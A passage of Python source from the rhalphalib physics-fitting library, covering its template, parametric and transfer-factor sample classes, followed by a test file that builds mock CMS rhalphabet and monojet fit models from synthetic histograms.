self._mask = mask
def setParamEffect(self, param, effect_up, effect_down=None):
raise NotImplementedError
def getParamEffect(self, param, up=True):
raise NotImplementedError
def getExpectation(self, nominal=False):
raise NotImplementedError
def renderRoofit(self, workspace):
raise NotImplementedError
def combineNormalization(self):
raise NotImplementedError
def combineParamEffect(self, param):
raise NotImplementedError
class TemplateSample(Sample):
def __init__(self, name, sampletype, template):
'''
name: self-explanatory
sampletype: Sample.SIGNAL or BACKGROUND or DATA
template: Either a ROOT TH1, a 1D Coffea Hist object, or a numpy histogram
in the latter case, please extend the numpy histogram tuple to define an observable name
i.e. (sumw, binning, name)
(for the others, the observable name is taken from the x axis name)
'''
super(TemplateSample, self).__init__(name, sampletype)
sumw2 = None
try:
sumw, binning, obs_name, sumw2 = _to_numpy(template, read_sumw2=True)
except ValueError:
sumw, binning, obs_name = _to_numpy(template)
observable = Observable(obs_name, binning)
self._observable = observable
self._nominal = sumw
self._sumw2 = sumw2
self._paramEffectsUp = {}
self._paramEffectsDown = {}
self._paramEffectScales = {}
self._extra_dependencies = set()
def show(self):
print(self._nominal)
if self._sumw2 is not None:
print(self._sumw2)
def scale(self, _scale):
self._nominal *= _scale
if self._sumw2 is not None:
self._sumw2 *= _scale*_scale
@property
def parameters(self):
'''
Set of independent parameters that affect this sample
'''
pset = set(self._paramEffectsUp.keys())
pset.update(self._extra_dependencies)
return pset
def setParamEffect(self, param, effect_up, effect_down=None, scale=None):
'''
Set the effect of a parameter on a sample (e.g. the size of unc. or multiplier for shape unc.)
param: a Parameter object
effect_up: a numpy array representing the relative (multiplicative) effect of the parameter on the bin yields,
or a single number representing the relative effect on the sample normalization,
or a histogram representing the *bin yield* under the effect of the parameter (i.e. not relative)
or a DependentParameter representing the value to scale the *normalization* of this process
effect_down: if asymmetric effects, fill this in, otherwise the effect_up value will be symmetrized
scale : number, optional
ad-hoc rescaling of the effect, most useful for shape effects where the nuisance parameter effect needs to be
magnified to ensure good vertical interpolation
N.B. the parameter must have a compatible combinePrior, i.e. if param.combinePrior is 'shape', then one must pass a numpy array
'''
if not isinstance(param, NuisanceParameter):
if isinstance(param, IndependentParameter) and isinstance(effect_up, DependentParameter):
extras = effect_up.getDependents() - {param}
if not all(isinstance(p, IndependentParameter) for p in extras):
raise ValueError("Normalization effects can only depend on one or more IndependentParameters")
self._extra_dependencies.update(extras)
for extra in extras:
self._paramEffectsUp[extra] = None
if effect_down is not None:
raise ValueError("Asymmetric normalization modifiers not supported. You can encode the effect in the dependent parameter")
effect_up.name = param.name + '_effect_' + self.name
self._paramEffectsUp[param] = effect_up
return
else:
raise ValueError("Template morphing can only be done via a NuisanceParameter or IndependentParameter")
if isinstance(effect_up, np.ndarray):
if len(effect_up) != self.observable.nbins:
raise ValueError("effect_up has the wrong number of bins (%d, expected %d)" % (len(effect_up), self.observable.nbins))
elif isinstance(effect_up, numbers.Number):
if 'shape' in param.combinePrior:
effect_up = np.full(self.observable.nbins, effect_up)
else:
effect_up, binning, _ = _to_numpy(effect_up)
if not np.array_equal(binning, self.observable.binning):
raise ValueError("effect_up has incompatible binning with sample %r" % self)
zerobins = self._nominal <= 0.
effect_up[zerobins] = 1.
effect_up[~zerobins] /= self._nominal[~zerobins]
if np.sum(effect_up * self._nominal) == 0:
# TODO: warning? this can happen regularly
# we might even want some sort of threshold
return
elif np.all(effect_up == 1.):
# some sort of threshold might be useful here as well
return
self._paramEffectsUp[param] = effect_up
if effect_down is not None:
if isinstance(effect_down, np.ndarray):
if len(effect_down) != self.observable.nbins:
raise ValueError("effect_down has the wrong number of bins (%d, expected %d)" % (len(effect_down), self.observable.nbins))
elif isinstance(effect_down, numbers.Number):
if 'shape' in param.combinePrior:
effect_down = np.full(self.observable.nbins, effect_down)
else:
effect_down, binning, _ = _to_numpy(effect_down)
if not np.array_equal(binning, self.observable.binning):
raise ValueError("effect_down has incompatible binning with sample %r" % self)
zerobins = self._nominal <= 0.
effect_down[zerobins] = 1.
effect_down[~zerobins] /= self._nominal[~zerobins]
if np.sum(effect_down * self._nominal) == 0:
# TODO: warning? this can happen regularly
# we might even want some sort of threshold
return
elif np.all(effect_down == 1.):
# some sort of threshold might be useful here as well
return
self._paramEffectsDown[param] = effect_down
else:
self._paramEffectsDown[param] = None
if isinstance(scale, numbers.Number):
if isinstance(effect_up, DependentParameter):
raise ValueError("Scale not supported for DependentParameter effects. You can encode the effect in the dependent parameter")
self._paramEffectScales[param] = scale
elif scale is not None:
raise ValueError("Cannot understand scale value %r. It should be a number" % scale)
def getParamEffect(self, param, up=True):
'''
Get the parameter effect
'''
if up:
return self._paramEffectsUp[param]
else:
if param not in self._paramEffectsDown or self._paramEffectsDown[param] is None:
# TODO the symmeterized value depends on if param prior is 'shapeN' or 'shape'
return 1. / self._paramEffectsUp[param]
return self._paramEffectsDown[param]
def autoMCStats(self):
''' Set MC statical uncertainties based on self._sumw2
'''
if self._sumw2 is None:
raise ValueError("No self._sumw2 defined in template")
return
for i in range(self.observable.nbins):
if self._nominal[i] <= 0. or self._sumw2[i] <= 0.:
continue
effect_up = np.ones_like(self._nominal)
effect_down = np.ones_like(self._nominal)
effect_up[i] = (self._nominal[i] + np.sqrt(self._sumw2[i]))/self._nominal[i]
effect_down[i] = max((self._nominal[i] - np.sqrt(self._sumw2[i]))/self._nominal[i], 0.)
param = NuisanceParameter(self.name + '_mcstat_bin%i' % i, combinePrior='shape')
self.setParamEffect(param, effect_up, effect_down)
def getExpectation(self, nominal=False):
'''
Create an array of per-bin expectations, accounting for all nuisance parameter effects
nominal: if True, calculate the nominal expectation (i.e. just plain numbers)
'''
nominalval = self._nominal.copy()
if self.mask is not None:
nominalval[~self.mask] = 0.
if nominal:
return nominalval
else:
out = np.array([IndependentParameter(self.name + "_bin%d_nominal" % i, v, constant=True) for i, v in enumerate(nominalval)])
for param in self.parameters:
effect_up = self.getParamEffect(param, up=True)
if effect_up is None:
continue
if param in self._paramEffectScales:
param_scaled = param * self._paramEffectScales[param]
else:
param_scaled = param
if isinstance(effect_up, DependentParameter):
out = out * effect_up
elif self._paramEffectsDown[param] is None:
if param.combinePrior == 'shape':
out = out * (1 + (effect_up - 1)*param_scaled)
elif param.combinePrior == 'shapeN':
out = out * (effect_up**param_scaled)
elif param.combinePrior == 'lnN':
# TODO: ensure scalar effect
out = out * (effect_up**param_scaled)
else:
raise NotImplementedError('per-bin effects for other nuisance parameter types')
else:
effect_down = self.getParamEffect(param, up=False)
smoothStep = SmoothStep(param_scaled)
if param.combinePrior == 'shape':
combined_effect = smoothStep * (1 + (effect_up - 1)*param_scaled) + (1 - smoothStep) * (1 - (effect_down - 1)*param_scaled)
elif param.combinePrior == 'shapeN':
combined_effect = smoothStep * (effect_up**param_scaled) + (1 - smoothStep) / (effect_down**param_scaled)
elif param.combinePrior == 'lnN':
# TODO: ensure scalar effect
combined_effect = smoothStep * (effect_up**param_scaled) + (1 - smoothStep) / (effect_down**param_scaled)
else:
raise NotImplementedError('per-bin effects for other nuisance parameter types')
out = out * combined_effect
return out
def renderRoofit(self, workspace):
'''
Import the necessary Roofit objects into the workspace for this sample
and return an extended pdf representing this sample's prediciton for pdf and norm.
'''
import ROOT
install_roofit_helpers()
normName = self.name + '_norm'
rooShape = workspace.pdf(self.name)
rooNorm = workspace.function(normName)
if rooShape == None and rooNorm == None: # noqa: E711
rooObservable = self.observable.renderRoofit(workspace)
nominal = self.getExpectation(nominal=True)
rooTemplate = ROOT.RooDataHist(self.name, self.name, ROOT.RooArgList(rooObservable), _to_TH1(nominal, self.observable.binning, self.observable.name))
workspace.add(rooTemplate)
for param in self.parameters:
effect_up = self.getParamEffect(param, up=True)
if 'shape' not in param.combinePrior:
# Normalization systematics can just go into combine datacards (although if we build PDF here, will need it)
if isinstance(effect_up, DependentParameter):
# this is a rateParam, we should add the IndependentParameter to the workspace
param.renderRoofit(workspace)
continue
name = self.name + '_' + param.name + 'Up'
shape = nominal * effect_up
rooTemplate = ROOT.RooDataHist(name, name, ROOT.RooArgList(rooObservable), _to_TH1(shape, self.observable.binning, self.observable.name))
workspace.add(rooTemplate)
name = self.name + '_' + param.name + 'Down'
shape = nominal * self.getParamEffect(param, up=False)
rooTemplate = ROOT.RooDataHist(name, name, ROOT.RooArgList(rooObservable), _to_TH1(shape, self.observable.binning, self.observable.name))
workspace.add(rooTemplate)
rooShape = ROOT.RooHistPdf(self.name, self.name, ROOT.RooArgSet(rooObservable), workspace.data(self.name))
workspace.add(rooShape)
rooNorm = IndependentParameter(normName, nominal.sum(), constant=True).renderRoofit(workspace)
# TODO build the pdf with systematics
elif rooShape == None or rooNorm == None: # noqa: E711
raise RuntimeError('Sample %r has either a shape or norm already embedded in workspace %r' % (self, workspace))
rooShape = workspace.pdf(self.name)
rooNorm = workspace.function(self.name + '_norm')
return rooShape, rooNorm
def combineNormalization(self):
return self.getExpectation(nominal=True).sum()
def combineParamEffect(self, param):
'''
A formatted string for placement into the combine datacard that represents
the effect of a parameter on a sample (e.g. the size of unc. or multiplier for shape unc.)
'''
if self._paramEffectsUp.get(param, None) is None:
return '-'
elif 'shape' in param.combinePrior:
return '%.3f' % self._paramEffectScales.get(param, 1)
elif isinstance(self.getParamEffect(param, up=True), DependentParameter):
# about here's where I start to feel painted into a corner
dep = self.getParamEffect(param, up=True)
channel, sample = self.name[:self.name.find('_')], self.name[self.name.find('_') + 1:]
dependents = dep.getDependents()
formula = dep.formula(rendering=True).format(**{var.name: '@%d' % i for i, var in enumerate(dependents)})
return '{0} rateParam {1} {2} {3} {4}'.format(dep.name,
channel,
sample,
formula,
",".join(p.name for p in dependents),
)
else:
# TODO the scaling here depends on the prior of the nuisance parameter
scale = self._paramEffectScales.get(param, 1.)
up = (self.getParamEffect(param, up=True) - 1) * scale + 1
down = (self.getParamEffect(param, up=False) - 1) * scale + 1
if isinstance(up, np.ndarray):
# Convert shape to norm (note symmeterized effect on shape != symmeterized effect on norm)
nominal = self.getExpectation(nominal=True)
if nominal.sum() == 0:
up = 1.
down = None
else:
up = (up * nominal).sum() / nominal.sum()
down = (down * nominal).sum() / nominal.sum()
elif self._paramEffectsDown[param] is None:
# Here we can safely defer to combine to calculate symmeterized effect
down = None
if down is None:
return '%.3f' % up
else:
return '%.3f/%.3f' % (up, down)
class ParametericSample(Sample):
PreferRooParametricHist = True
def __init__(self, name, sampletype, observable, params):
'''
Create a sample that is a binned function, where each bin yield
is given by the param in params. The list params should have the
same number of bins as observable.
'''
super(ParametericSample, self).__init__(name, sampletype)
if not isinstance(observable, Observable):
raise ValueError
if len(params) != observable.nbins:
raise ValueError
self._observable = observable
self._nominal = np.array(params)
if not all(isinstance(p, Parameter) for p in self._nominal):
raise ValueError("ParametericSample expects parameters to derive from Parameter type.")
self._paramEffectsUp = {}
self._paramEffectsDown = {}
@property
def parameters(self):
'''
Set of independent parameters that affect this sample
'''
pset = set()
for p in self.getExpectation():
pset.update(p.getDependents(deep=True))
return pset
def setParamEffect(self, param, effect_up, effect_down=None):
'''
Set the effect of a parameter on a sample (e.g. the size of unc. or multiplier for shape unc.)
param: a Parameter object
effect_up: a numpy array representing the relative (multiplicative) effect of the parameter on the bin yields,
or a single number representing the relative effect on the sample normalization,
effect_down: if asymmetric effects, fill this in, otherwise the effect_up value will be symmetrized
N.B. the parameter must have a compatible combinePrior, i.e. if param.combinePrior is 'shape', then one must pass a numpy array
'''
if not isinstance(param, NuisanceParameter):
raise ValueError("Template morphing can only be done via a NuisanceParameter")
if isinstance(effect_up, np.ndarray):
if len(effect_up) != self.observable.nbins:
raise ValueError("effect_up has the wrong number of bins (%d, expected %d)" % (len(effect_up), self.observable.nbins))
elif isinstance(effect_up, numbers.Number):
if 'shape' in param.combinePrior:
effect_up = np.full(self.observable.nbins, effect_up)
else:
raise ValueError("unrecognized effect_up type")
self._paramEffectsUp[param] = effect_up
if effect_down is not None:
if isinstance(effect_down, np.ndarray):
if len(effect_down) != self.observable.nbins:
raise ValueError("effect_down has the wrong number of bins (%d, expected %d)" % (len(effect_down), self.observable.nbins))
elif isinstance(effect_down, numbers.Number):
if 'shape' in param.combinePrior:
effect_down = np.full(self.observable.nbins, effect_down)
else:
raise ValueError("unrecognized effect_down type")
self._paramEffectsDown[param] = effect_down
else:
self._paramEffectsDown[param] = None
def getParamEffect(self, param, up=True):
'''
Get the parameter effect
'''
if up:
return self._paramEffectsUp[param]
else:
if self._paramEffectsDown[param] is None:
# TODO the symmeterized value depends on if param prior is 'shapeN' or 'shape'
return 1. / self._paramEffectsUp[param]
return self._paramEffectsDown[param]
def getExpectation(self, nominal=False):
'''
Create an array of per-bin expectations, accounting for all nuisance parameter effects
nominal: if True, calculate the nominal expectation (i.e. just plain numbers)
'''
out = self._nominal.copy() # this is a shallow copy
if self.mask is not None:
out[~self.mask] = [IndependentParameter("masked", 0, constant=True) for _ in range((~self.mask).sum())]
if nominal:
return np.array([p.value for p in out])
else:
for param in self._paramEffectsUp.keys():
effect_up = self.getParamEffect(param, up=True)
if effect_up is None:
pass
if self._paramEffectsDown[param] is None:
out = out * (effect_up**param)
else:
effect_down = self.getParamEffect(param, up=False)
smoothStep = SmoothStep(param)
combined_effect = smoothStep * (effect_up**param) + (1 - smoothStep) * (effect_down**param)
out = out * combined_effect
for i, p in enumerate(out):
p.name = self.name + '_bin%d' % i
if isinstance(p, DependentParameter):
# Let's make sure to render these
p.intermediate = False
return out
def renderRoofit(self, workspace):
'''
Produce a RooParametricHist (if available) or RooParametricStepFunction and add to workspace
Note: for RooParametricStepFunction, bin values cannot be zero due to this ridiculous line:
https://github.com/root-project/root/blob/master/roofit/roofit/src/RooParametricStepFunction.cxx#L212-L213
'''
import ROOT
install_roofit_helpers()
rooShape = workspace.pdf(self.name)
rooNorm = workspace.function(self.name + '_norm')
if rooShape == None and rooNorm == None: # noqa: E711
rooObservable = self.observable.renderRoofit(workspace)
params = self.getExpectation()
if hasattr(ROOT, 'RooParametricHist') and self.PreferRooParametricHist:
rooParams = [p.renderRoofit(workspace) for p in params]
# need a dummy hist to generate proper binning
dummyHist = _to_TH1(np.zeros(self.observable.nbins), self.observable.binning, self.observable.name)
rooShape = ROOT.RooParametricHist(self.name, self.name, rooObservable, ROOT.RooArgList.fromiter(rooParams), dummyHist)
rooNorm = ROOT.RooAddition(self.name + '_norm', self.name + '_norm', ROOT.RooArgList.fromiter(rooParams))
workspace.add(rooShape)
workspace.add(rooNorm)
else:
if self.PreferRooParametricHist:
warnings.warn("Could not load RooParametricHist, falling back to RooParametricStepFunction, which has strange rounding issues.\n"
"Set ParametericSample.PreferRooParametricHist = False to disable this warning",
RuntimeWarning)
# RooParametricStepFunction expects parameters to represent PDF density (i.e. bin width normalized, and integrates to 1)
norm = _pairwise_sum(params)
norm.name = self.name + '_norm'
norm.intermediate = False
binw = np.diff(self.observable.binning)
dparams = params / binw / norm
for p, oldp in zip(dparams, params):
p.name = oldp.name + "_density"
p.intermediate = False
# The last bin value is defined by 1 - sum(others), so no need to render it
rooParams = [p.renderRoofit(workspace) for p in dparams[:-1]]
rooShape = ROOT.RooParametricStepFunction(self.name, self.name,
rooObservable,
ROOT.RooArgList.fromiter(rooParams),
self.observable.binningTArrayD(),
self.observable.nbins
)
workspace.add(rooShape)
rooNorm = norm.renderRoofit(workspace) # already rendered but we want to return it
elif rooShape == None or rooNorm == None: # noqa: E711
raise RuntimeError('Channel %r has either a shape or norm already embedded in workspace %r' % (self, workspace))
rooShape = workspace.pdf(self.name)
rooNorm = workspace.function(self.name + '_norm')
return rooShape, rooNorm
def combineNormalization(self):
'''
For combine, the normalization in the card is used to scale the parameteric process PDF
Since we provide an explicit normalization function, this should always stay at 1.
'''
# TODO: optionally we could set the normalization here and leave only normalization modifiers
return 1.
def combineParamEffect(self, param):
'''
Combine cannot build shape param effects for parameterized templates, so we have to do it in the model.
'''
return '-'
class TransferFactorSample(ParametericSample):
def __init__(self, name, sampletype, transferfactor, dependentsample, observable=None):
'''
Create a sample that depends on another Sample by some transfer factor.
The transfor factor can be a constant, an array of parameters of same length
as the dependent sample binning, or a matrix of parameters where the second
dimension matches the sample binning, i.e. expectation = tf @ dependent_expectation.
The latter requires an additional observable argument to specify the definition of the first dimension.
In all cases, please use numpy object arrays of Parameter types.
'''
if not isinstance(transferfactor, np.ndarray):
raise ValueError("Transfer factor is not a numpy array")
if not isinstance(dependentsample, Sample):
raise ValueError("Dependent sample does not inherit from Sample")
if len(transferfactor.shape) == 2:
if observable is None:
raise ValueError("Transfer factor is 2D array, please provide an observable")
params = np.dot(transferfactor, dependentsample.getExpectation())
elif len(transferfactor.shape) <= 1:
observable = dependentsample.observable
params = transferfactor * dependentsample.getExpectation()
else:
raise ValueError("Transfer factor has invalid dimension")
super(TransferFactorSample, self).__init__(name, sampletype, observable, params)
self._transferfactor = transferfactor
self._dependentsample = dependentsample
@property
def transferfactor(self):
return self._transferfactor
@property
def dependentsample(self):
return self._dependentsample
```
#### File: rhalphalib/tests/test_rhalphalib.py
```python
from __future__ import print_function, division
import sys
import os
import rhalphalib as rl
import numpy as np
import scipy.stats
import pickle
import ROOT
rl.util.install_roofit_helpers()
rl.ParametericSample.PreferRooParametricHist = False
def expo_sample(norm, scale, obs):
cdf = scipy.stats.expon.cdf(scale=scale, x=obs.binning) * norm
return (np.diff(cdf), obs.binning, obs.name)
def gaus_sample(norm, loc, scale, obs):
cdf = scipy.stats.norm.cdf(loc=loc, scale=scale, x=obs.binning) * norm
return (np.diff(cdf), obs.binning, obs.name)
def test_rhalphabet(tmpdir):
throwPoisson = False
jec = rl.NuisanceParameter('CMS_jec', 'lnN')
massScale = rl.NuisanceParameter('CMS_msdScale', 'shape')
lumi = rl.NuisanceParameter('CMS_lumi', 'lnN')
tqqeffSF = rl.IndependentParameter('tqqeffSF', 1., 0, 10)
tqqnormSF = rl.IndependentParameter('tqqnormSF', 1., 0, 10)
ptbins = np.array([450, 500, 550, 600, 675, 800, 1200])
npt = len(ptbins) - 1
msdbins = np.linspace(40, 201, 24)
msd = rl.Observable('msd', msdbins)
# here we derive these all at once with 2D array
ptpts, msdpts = np.meshgrid(ptbins[:-1] + 0.3 * np.diff(ptbins), msdbins[:-1] + 0.5 * np.diff(msdbins), indexing='ij')
rhopts = 2*np.log(msdpts/ptpts)
ptscaled = (ptpts - 450.) / (1200. - 450.)
rhoscaled = (rhopts - (-6)) / ((-2.1) - (-6))
validbins = (rhoscaled >= 0) & (rhoscaled <= 1)
rhoscaled[~validbins] = 1 # we will mask these out later
# Build qcd MC pass+fail model and fit to polynomial
qcdmodel = rl.Model("qcdmodel")
qcdpass, qcdfail = 0., 0.
for ptbin in range(npt):
failCh = rl.Channel("ptbin%d%s" % (ptbin, 'fail'))
passCh = rl.Channel("ptbin%d%s" % (ptbin, 'pass'))
qcdmodel.addChannel(failCh)
qcdmodel.addChannel(passCh)
# mock template
ptnorm = 1
failTempl = expo_sample(norm=ptnorm*1e5, scale=40, obs=msd)
passTempl = expo_sample(norm=ptnorm*1e3, scale=40, obs=msd)
failCh.setObservation(failTempl)
passCh.setObservation(passTempl)
qcdfail += failCh.getObservation().sum()
qcdpass += passCh.getObservation().sum()
qcdeff = qcdpass / qcdfail
tf_MCtempl = rl.BernsteinPoly("tf_MCtempl", (2, 2), ['pt', 'rho'], limits=(0, 10))
tf_MCtempl_params = qcdeff * tf_MCtempl(ptscaled, rhoscaled)
for ptbin in range(npt):
failCh = qcdmodel['ptbin%dfail' % ptbin]
passCh = qcdmodel['ptbin%dpass' % ptbin]
failObs = failCh.getObservation()
qcdparams = np.array([rl.IndependentParameter('qcdparam_ptbin%d_msdbin%d' % (ptbin, i), 0) for i in range(msd.nbins)])
sigmascale = 10.
scaledparams = failObs * (1 + sigmascale/np.maximum(1., np.sqrt(failObs)))**qcdparams
fail_qcd = rl.ParametericSample('ptbin%dfail_qcd' % ptbin, rl.Sample.BACKGROUND, msd, scaledparams)
failCh.addSample(fail_qcd)
pass_qcd = rl.TransferFactorSample('ptbin%dpass_qcd' % ptbin, rl.Sample.BACKGROUND, tf_MCtempl_params[ptbin, :], fail_qcd)
passCh.addSample(pass_qcd)
failCh.mask = validbins[ptbin]
passCh.mask = validbins[ptbin]
qcdfit_ws = ROOT.RooWorkspace('qcdfit_ws')
simpdf, obs = qcdmodel.renderRoofit(qcdfit_ws)
qcdfit = simpdf.fitTo(obs,
ROOT.RooFit.Extended(True),
ROOT.RooFit.SumW2Error(True),
ROOT.RooFit.Strategy(2),
ROOT.RooFit.Save(),
ROOT.RooFit.Minimizer('Minuit2', 'migrad'),
ROOT.RooFit.PrintLevel(-1),
)
qcdfit_ws.add(qcdfit)
if "pytest" not in sys.modules:
qcdfit_ws.writeToFile(os.path.join(str(tmpdir), 'testModel_qcdfit.root'))
if qcdfit.status() != 0:
raise RuntimeError('Could not fit qcd')
param_names = [p.name for p in tf_MCtempl.parameters.reshape(-1)]
decoVector = rl.DecorrelatedNuisanceVector.fromRooFitResult(tf_MCtempl.name + '_deco', qcdfit, param_names)
tf_MCtempl.parameters = decoVector.correlated_params.reshape(tf_MCtempl.parameters.shape)
tf_MCtempl_params_final = tf_MCtempl(ptscaled, rhoscaled)
tf_dataResidual = rl.BernsteinPoly("tf_dataResidual", (2, 2), ['pt', 'rho'], limits=(0, 10))
tf_dataResidual_params = tf_dataResidual(ptscaled, rhoscaled)
tf_params = qcdeff * tf_MCtempl_params_final * tf_dataResidual_params
# build actual fit model now
model = rl.Model("testModel")
for ptbin in range(npt):
for region in ['pass', 'fail']:
ch = rl.Channel("ptbin%d%s" % (ptbin, region))
model.addChannel(ch)
isPass = region == 'pass'
ptnorm = 1.
templates = {
'wqq': gaus_sample(norm=ptnorm*(100 if isPass else 300), loc=80, scale=8, obs=msd),
'zqq': gaus_sample(norm=ptnorm*(200 if isPass else 100), loc=91, scale=8, obs=msd),
'tqq': gaus_sample(norm=ptnorm*(40 if isPass else 80), loc=150, scale=20, obs=msd),
'hqq': gaus_sample(norm=ptnorm*(20 if isPass else 5), loc=125, scale=8, obs=msd),
}
for sName in ['zqq', 'wqq', 'tqq', 'hqq']:
# some mock expectations
templ = templates[sName]
stype = rl.Sample.SIGNAL if sName == 'hqq' else rl.Sample.BACKGROUND
sample = rl.TemplateSample(ch.name + '_' + sName, stype, templ)
# mock systematics
jecup_ratio = np.random.normal(loc=1, scale=0.05, size=msd.nbins)
msdUp = np.linspace(0.9, 1.1, msd.nbins)
msdDn = np.linspace(1.2, 0.8, msd.nbins)
# for jec we set lnN prior, shape will automatically be converted to norm systematic
sample.setParamEffect(jec, jecup_ratio)
sample.setParamEffect(massScale, msdUp, msdDn)
sample.setParamEffect(lumi, 1.027)
ch.addSample(sample)
# make up a data_obs, with possibly different yield values
templates = {
'wqq': gaus_sample(norm=ptnorm*(100 if isPass else 300), loc=80, scale=8, obs=msd),
'zqq': gaus_sample(norm=ptnorm*(200 if isPass else 100), loc=91, scale=8, obs=msd),
'tqq': gaus_sample(norm=ptnorm*(40 if isPass else 80), loc=150, scale=20, obs=msd),
'hqq': gaus_sample(norm=ptnorm*(20 if isPass else 5), loc=125, scale=8, obs=msd),
'qcd': expo_sample(norm=ptnorm*(1e3 if isPass else 1e5), scale=40, obs=msd),
}
yields = sum(tpl[0] for tpl in templates.values())
if throwPoisson:
yields = np.random.poisson(yields)
data_obs = (yields, msd.binning, msd.name)
ch.setObservation(data_obs)
# drop bins outside rho validity
mask = validbins[ptbin]
# blind bins 11, 12, 13
# mask[11:14] = False
ch.mask = mask
for ptbin in range(npt):
failCh = model['ptbin%dfail' % ptbin]
passCh = model['ptbin%dpass' % ptbin]
qcdparams = np.array([rl.IndependentParameter('qcdparam_ptbin%d_msdbin%d' % (ptbin, i), 0) for i in range(msd.nbins)])
initial_qcd = failCh.getObservation().astype(float) # was integer, and numpy complained about subtracting float from it
for sample in failCh:
initial_qcd -= sample.getExpectation(nominal=True)
if np.any(initial_qcd < 0.):
raise ValueError("initial_qcd negative for some bins..", initial_qcd)
sigmascale = 10 # to scale the deviation from initial
scaledparams = initial_qcd * (1 + sigmascale/np.maximum(1., np.sqrt(initial_qcd)))**qcdparams
fail_qcd = rl.ParametericSample('ptbin%dfail_qcd' % ptbin, rl.Sample.BACKGROUND, msd, scaledparams)
failCh.addSample(fail_qcd)
pass_qcd = rl.TransferFactorSample('ptbin%dpass_qcd' % ptbin, rl.Sample.BACKGROUND, tf_params[ptbin, :], fail_qcd)
passCh.addSample(pass_qcd)
tqqpass = passCh['tqq']
tqqfail = failCh['tqq']
tqqPF = tqqpass.getExpectation(nominal=True).sum() / tqqfail.getExpectation(nominal=True).sum()
tqqpass.setParamEffect(tqqeffSF, 1*tqqeffSF)
tqqfail.setParamEffect(tqqeffSF, (1 - tqqeffSF) * tqqPF + 1)
tqqpass.setParamEffect(tqqnormSF, 1*tqqnormSF)
tqqfail.setParamEffect(tqqnormSF, 1*tqqnormSF)
# Fill in muon CR
for region in ['pass', 'fail']:
ch = rl.Channel("muonCR%s" % (region, ))
model.addChannel(ch)
isPass = region == 'pass'
templates = {
'tqq': gaus_sample(norm=10*(30 if isPass else 60), loc=150, scale=20, obs=msd),
'qcd': expo_sample(norm=10*(5e2 if isPass else 1e3), scale=40, obs=msd),
}
for sName, templ in templates.items():
stype = rl.Sample.BACKGROUND
sample = rl.TemplateSample(ch.name + '_' + sName, stype, templ)
# mock systematics
jecup_ratio = np.random.normal(loc=1, scale=0.05, size=msd.nbins)
sample.setParamEffect(jec, jecup_ratio)
ch.addSample(sample)
# make up a data_obs
templates = {
'tqq': gaus_sample(norm=10*(30 if isPass else 60), loc=150, scale=20, obs=msd),
'qcd': expo_sample(norm=10*(5e2 if isPass else 1e3), scale=40, obs=msd),
}
yields = sum(tpl[0] for tpl in templates.values())
if throwPoisson:
yields = np.random.poisson(yields)
data_obs = (yields, msd.binning, msd.name)
ch.setObservation(data_obs)
tqqpass = model['muonCRpass_tqq']
tqqfail = model['muonCRfail_tqq']
tqqPF = tqqpass.getExpectation(nominal=True).sum() / tqqfail.getExpectation(nominal=True).sum()
tqqpass.setParamEffect(tqqeffSF, 1*tqqeffSF)
tqqfail.setParamEffect(tqqeffSF, (1 - tqqeffSF) * tqqPF + 1)
tqqpass.setParamEffect(tqqnormSF, 1*tqqnormSF)
tqqfail.setParamEffect(tqqnormSF, 1*tqqnormSF)
with open(os.path.join(str(tmpdir), 'testModel.pkl'), "wb") as fout:
pickle.dump(model, fout)
model.renderCombine(os.path.join(str(tmpdir), 'testModel'))
def test_monojet(tmpdir):
model = rl.Model("testMonojet")
# lumi = rl.NuisanceParameter('CMS_lumi', 'lnN')
jec = rl.NuisanceParameter('CMS_jec', 'shape')
ele_id_eff = rl.NuisanceParameter('CMS_ele_id_eff', 'shape')
pho_id_eff = rl.NuisanceParameter('CMS_pho_id_eff', 'shape')
gamma_to_z_ewk = rl.NuisanceParameter('Theory_gamma_z_ewk', 'shape')
recoilbins = np.linspace(300, 1200, 13)
recoil = rl.Observable('recoil', recoilbins)
signalCh = rl.Channel("signalCh")
model.addChannel(signalCh)
zvvTemplate = expo_sample(1000, 400, recoil)
zvvJetsMC = rl.TemplateSample('zvvJetsMC', rl.Sample.BACKGROUND, zvvTemplate)
zvvJetsMC.setParamEffect(jec, np.random.normal(loc=1, scale=0.01, size=recoil.nbins))
# these parameters are large, should probably log-transform them
zvvBinYields = np.array([rl.IndependentParameter('tmp', b, 0, zvvTemplate[0].max()*2) for b in zvvTemplate[0]]) # name will be changed by ParametericSample
zvvJets = rl.ParametericSample('signalCh_zvvJets', rl.Sample.BACKGROUND, recoil, zvvBinYields)
signalCh.addSample(zvvJets)
dmTemplate = expo_sample(100, 800, recoil)
dmSample = rl.TemplateSample('signalCh_someDarkMatter', rl.Sample.SIGNAL, dmTemplate)
signalCh.addSample(dmSample)
signalCh.setObservation(expo_sample(1000, 400, recoil))
zllCh = rl.Channel("zllCh")
model.addChannel(zllCh)
zllTemplate = expo_sample(1000*6.6/20, 400, recoil)
zllJetsMC = rl.TemplateSample('zllJetsMC', rl.Sample.BACKGROUND, zllTemplate)
zllJetsMC.setParamEffect(jec, np.random.normal(loc=1, scale=0.05, size=recoil.nbins))
zllJetsMC.setParamEffect(ele_id_eff, np.random.normal(loc=1, scale=0.02, size=recoil.nbins), np.random.normal(loc=1, scale=0.02, size=recoil.nbins))
zllTransferFactor = zllJetsMC.getExpectation() / zvvJetsMC.getExpectation()
zllJets = rl.TransferFactorSample('zllCh_zllJets', rl.Sample.BACKGROUND, zllTransferFactor, zvvJets)
zllCh.addSample(zllJets)
otherbkgTemplate = expo_sample(200, 250, recoil)
otherbkg = rl.TemplateSample('zllCh_otherbkg', rl.Sample.BACKGROUND, otherbkgTemplate)
otherbkg.setParamEffect(jec, np.random.normal(loc=1, scale=0.01, size=recoil.nbins))
zllCh.addSample(otherbkg)
zllCh.setObservation(expo_sample(1200, 380, recoil))
gammaCh = rl.Channel("gammaCh")
model.addChannel(gammaCh)
gammaTemplate = expo_sample(2000, 450, recoil)
gammaJetsMC = rl.TemplateSample('gammaJetsMC', rl.Sample.BACKGROUND, gammaTemplate)
gammaJetsMC.setParamEffect(jec, np.random.normal(loc=1, scale=0.05, size=recoil.nbins))
gammaJetsMC.setParamEffect(pho_id_eff, np.random.normal(loc=1, scale=0.02, size=recoil.nbins))
gammaTransferFactor = gammaJetsMC.getExpectation() / zvvJetsMC.getExpectation()
gammaJets = rl.TransferFactorSample('gammaCh_gammaJets', rl.Sample.BACKGROUND, gammaTransferFactor, zvvJets)
gammaJets.setParamEffect(gamma_to_z_ewk, np.linspace(1.01, 1.05, recoil.nbins))
gammaCh.addSample(gammaJets)
gammaCh.setObservation(expo_sample(2000, 450, recoil))
